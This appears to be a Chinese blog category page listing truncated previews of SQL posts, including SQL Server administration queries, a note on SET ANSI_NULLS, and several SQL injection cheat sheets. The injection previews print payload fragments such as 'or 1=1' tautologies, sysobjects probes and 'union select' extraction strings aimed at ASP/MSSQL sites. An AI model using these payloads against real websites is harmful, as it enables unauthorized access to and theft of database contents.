sql
文章平均质量分 56
lk2010
这个作者很懒,什么都没留下…
展开
-
SQL Server 管理常用的SQL和T-SQL
SQL Server 管理常用的SQL和T-SQL1. 查看数据库的版本 select @@version 常见的几种SQL SERVER打补丁后的版本号: 8.00.194 Microsoft SQL Server 2000 8.00.384 Microsoft SQL Server 2000 SP1 8.00.532 Microsoft SQL Serve原创 2009-07-25 01:23:00 · 268 阅读 · 0 评论 -
注入常用SQL语句
and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //当前数据库名and 1=(select @@serve原创 2010-02-21 16:27:00 · 362 阅读 · 0 评论 -
sql手工注入
SQL手工注入大全2006年08月11日 星期五 21:00比方说在查询id是50的数据时,如果用户传近来的参数是50 and 1=1,如果没有设置过滤的话,可以直接查出来,SQL 注入一般在ASP程序中遇到最多, 看看下面的 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统原创 2010-02-21 16:37:00 · 320 阅读 · 0 评论 -
SQL注入天书
虽然这个文章有点历史了,但是对学习SQL注入仍然是一个不错的文章。引 言 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参 差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据 库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的S原创 2010-02-22 10:55:00 · 299 阅读 · 0 评论 -
注入经典语句总结
注入经典语句总结 or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union sele原创 2010-02-22 00:30:00 · 283 阅读 · 0 评论 -
T-SQL之SET ANSI_NULLS
T-SQL之SET ANSI_NULLS<br /> 当 SET ANSI_NULLS 为 ON 时,即使 column_name 中包含空值,使用 WHERE column_name = NULL 的 SELECT 语句仍返回零行。即使 column_name 中包含非空值,使用 WHERE column_name <> NULL 的 SELECT 语句仍会返回零行。<br /> 当 SET ANSI_NULLS 为 OFF 时,等于 (=) 和不等于 (<>) 比较运算符不遵守 IS原创 2011-04-18 16:32:00 · 687 阅读 · 0 评论